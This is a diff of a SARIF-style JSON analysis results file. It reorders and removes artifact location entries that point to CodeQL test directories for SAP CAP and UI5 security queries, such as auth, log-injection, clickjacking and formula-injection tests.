@@ -14117,13 +14117,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 29 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 30 } @@ -14153,13 +14153,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 35 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 36 } 
@@ -14177,13 +14177,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 39 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", "uriBaseId" : "%SRCROOT%", "index" : 40 } @@ -14201,13 +14201,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 43 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 44 } 
@@ -14219,43 +14219,43 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 46 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", "uriBaseId" : "%SRCROOT%", "index" : 47 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 48 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", "uriBaseId" : "%SRCROOT%", "index" : 49 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 50 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 51 } }, { "location" : { - "uri" 
: "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 52 } 
@@ -14291,26199 +14291,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 58 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 59 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 60 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 61 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 62 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 63 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 64 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 65 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 66 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 67 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 68 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 69 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 70 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 71 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 72 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 73 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 74 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 75 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 76 - } - }, { - "location" : { - 
"uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 77 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 78 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 79 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 80 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 81 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 82 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 83 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 84 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 85 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 86 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 87 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 88 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 89 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 90 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 91 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 92 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 93 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 94 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 95 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 96 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 97 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 98 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 99 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 100 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 102 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 104 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 105 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 110 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 111 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 112 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 116 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 117 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/src/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 118 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/src/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 119 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 120 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 121 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 123 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", - "uriBaseId" : "%SRCROOT%", - "index" : 124 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", - "uriBaseId" : "%SRCROOT%", - "index" : 125 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 126 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 127 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 128 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 129 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 130 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 131 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 132 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 133 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 134 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 135 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 136 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 137 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 138 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 139 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 140 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 141 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 142 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 143 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 144 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 146 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 147 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 148 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 149 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 150 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 151 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" 
: 152 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 153 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 155 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 156 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 157 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 158 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 159 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 160 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 161 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 162 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 163 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 164 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 165 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 168 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 169 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 170 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 172 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 173 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 174 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 175 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 176 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 177 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 178 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 181 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 182 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 183 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 184 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 185 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 186 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 187 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 190 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", - 